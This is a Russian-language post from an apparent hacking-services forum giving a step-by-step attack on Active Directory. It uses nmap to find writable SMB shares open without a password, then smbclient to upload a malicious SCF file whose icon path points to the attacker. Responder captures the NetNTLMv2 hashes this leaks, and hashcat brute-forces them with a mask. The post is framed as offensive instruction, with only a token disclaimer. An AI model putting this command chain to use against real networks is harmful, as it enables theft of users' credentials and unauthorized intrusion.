Jump to content
Новости и объявления.
  • Уважаемые гости. При посещении нашего сайта, просим вас ознакомиться с разделами форума, прежде чем оставлять ваши объявления и т.д. Рекомендуем посетить разделы: "Общение, Коммерческий раздел, Услуги Хакеров и статьи, Отзывы о сайте и пользователях, Черный список" и другие разделы нашего сайта. ***ВНИМАНИЕ*** При обращении за помощью, просим быть внимательными, на сайте есть, как проверенные специалисты, так и непроверенные. Если вы обратились к специалисту, который проверку НЕ проходил, рекомендуем воспользоваться услугой гарант сервиса. xakervip.com
  • Взлом
  • Взлом
  • Гарант-сервис
  • Реклама на форуме

Recommended Posts

Приветствую, хакеры! Сегодня рассмотрим один вариант атаки на Active Directory.

Сперва сканируем сеть на предмет файловых хранилищ с подключением без пароля:

nmap -p 445 -sV --script=smb-enum-shares /, где:

●      -p — порт;

●      -sV — проверка версии сервиса;

●      --script=smb-enum-shares — подключение скрипта, чтобы узнать список сетевых ресурсов и права на них.

Необходим ресурс, в котором права нынешнего пользователя будут как на чтение, так и на запись (это видно в выводе скрипта). Для доступа без пароля подключение выполняется следующей командой:

smbclient \\\\\\

В это хранилище загружаем SCF файл. Формат файла scf — файлы команды для проводника. Запускать его никому не придётся, ведь Windows заходит в директорию и ищет в ней scf-файлы или, например, ярлыки. Если находит, проверяет оригинальный файл, на который они ссылаются. Содержимое файла следующее:

[shell]

Command=2

IconFile=\\\

[Taskbar]

Command=ToggleDesktop

Поскольку есть подключение к консоли smb, можем добавить в неё файл командой:

put

В это же время запускаем responder (об этой утилите рассказывалось в предыдущей части):

Responder -I eth0 -wrf

Работать предстоит с NetNTLMv2, как заметно из названия, это старший брат NTLM, то есть защищён лучше и брутить его дольше, но ничего нас не остановит

После получения хеша начинаем его обработку. Команда следующая:

hashcat -m 5600 -a 3 Файл_с_хешем> -w 2 -O -1 ?l?d -i --increment-min=1 --increment-max=6 ?1?1?1?1?1?1, где:

●      -m 5600 — тип NetNTLMv2;

●      -a 3 — атака перебора по маске;

●      -w 2 — чем больше цифра, тем сильнее нагрузка (1-4);

●      -O — оптимизация ядра, если возможно;

●      -1 ?l?d — определяем пользовательский словарь из маленьких латинских и цифр;

●      -i –increment-min=1 –increment-max=6 — последовательный перебор количества символов;

●      ?1?1?1?1?1?1 — маска. Применяет пользовательский словарь к каждому символу.

 

Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации

 

 

Link to comment
Share on other sites

  • Реклама на форуме

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.
Note: Your post will require moderator approval before it will be visible.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

Loading...

  • Member Statistics

    6,256
    Total Members
    30,834
    Most Online
    саня328
    Newest Member
    саня328
    Joined
×
×
  • Create New...

Important Information

Guidelines
Terms of Use
We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.